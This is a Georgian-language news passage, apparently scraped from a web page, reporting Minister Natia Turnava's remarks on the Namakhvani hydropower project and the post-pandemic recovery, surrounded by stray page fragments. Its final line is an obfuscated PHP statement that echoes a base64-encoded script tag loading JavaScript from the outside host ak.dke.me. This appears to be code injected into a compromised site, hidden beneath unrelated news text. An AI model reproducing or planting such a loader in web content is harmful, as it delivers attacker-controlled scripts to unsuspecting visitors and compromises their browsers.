celsiusi
ავერსი საქკაბელი
ყველა უნდა ვისწრაფვოდეთ, რომ მალე დავძლიოთ პანდემიისგან გამოწვეული პრობლემები და სწრაფად აღვადგინოთ ეკონომიკა, რომლის განმტკიცების ერთ-ერთი მყარი საფუძველი არის სწორედ ძლიერი, დამოუკიდებელი ენერგეტიკული სისტემა და ამ სისტემაში „ნამახვანი ჰესის“ პროექტი არის ერთ-ერთი მნიშვნელოვანი ნაწილი. შესაბამისად, ულტიმატუმები და რადიკალიზაცია ნამდვილად არ არის სწორი გზა და ვფიქრობ, „ნამახვანი ჰესთან“ დაკავშირებით სწორი კომუნიკაციის ფარგლებში ყველა პრობლემა აღმოიფხვრება,- ამის შესახებ ნათია თურნავამ მთავრობის ადმინისტრაციაში გამართულ ბრიფინგზე „ნამახვანი ჰესთან“ დაკავშირებით მიმდინარე მოვლენებზე დასმული კითხვის საპასუხოდ განაცხადა.
 
მინისტრის თქმით, პანდემიამ წელიწადნახევრის განმავლობაში ქვეყნის თითქმის პარალიზება გამოიწვია და ახლა ყველა ერთად მუშაობს იმისთვის, რომ გაიხსნას, ამოქმედდეს და გამოცოცხლდეს ტურიზმი, ამუშავდეს ბიზნესი, ტრანსპორტი, მაღაზიები და ჩამოსულ ტურისტებს დახვდეს უსაფრთხო და მიმზიდველი გარემო.
 
„აქედან გამომდინარე, ცხადია, ყველა უნდა ვისწრაფვოდეთ, ამ მიმართულებით ვიაროთ. დარწმუნებული ვარ, რომ ყველა იმ პლატფორმის ფარგლებში, რაც გვაქვს „ნამახვანი ჰესთან მიმართებაში და გამოცხადებული მორატორიუმის პირობებში, ნამახვანი გახდება გაცილებით უფრო სრულყოფილი პროექტი და ყველა კითხვას გაეცემა პასუხი“, - აღნიშნა ნათია თურნავამ.
1322
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");